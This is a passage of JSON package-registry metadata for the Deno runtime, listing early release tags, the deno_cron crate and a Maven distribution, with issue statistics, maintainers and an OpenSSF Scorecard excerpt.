a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T11:48:15.797Z","dependent_packages_count":1,"downloads":280441,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":27.41624289560275,"dependent_repos_count":13.187857206978066,"dependent_packages_count":18.18453850412197,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":null,"average":11.769693021968736},"purl":"pkg:cargo/deno_cron","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cron","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cron","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cron/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cron/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cron/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cron/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cron/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cron/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cron/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2023-11-02T00:07:04.506Z","updated_at":"2023-11-02T00:07:04.506Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-11-10T21:47:54.165Z","updated_at":"2023-11-10T21:47:54.165Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":12401428,"name":"org.mvnpm.at.deno:linux-x64-glibc","ecosystem":"maven","description":"linux-x64-glibc distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm.at.deno","versions_count":17,"first_release_published_at":"2025-10-20T11:20:25.000Z","latest_release_published_at":"2026-08-08T02:21:22.000Z","latest_release_number":"2.9.5","last_synced_at":"2026-08-28T22:36:39.802Z","created_at":"2025-10-20T11:32:04.513Z","updated_at":"2026-08-28T22:36:39.802Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.deno/linux-x64-glibc/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.deno/linux-x64-glibc/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a 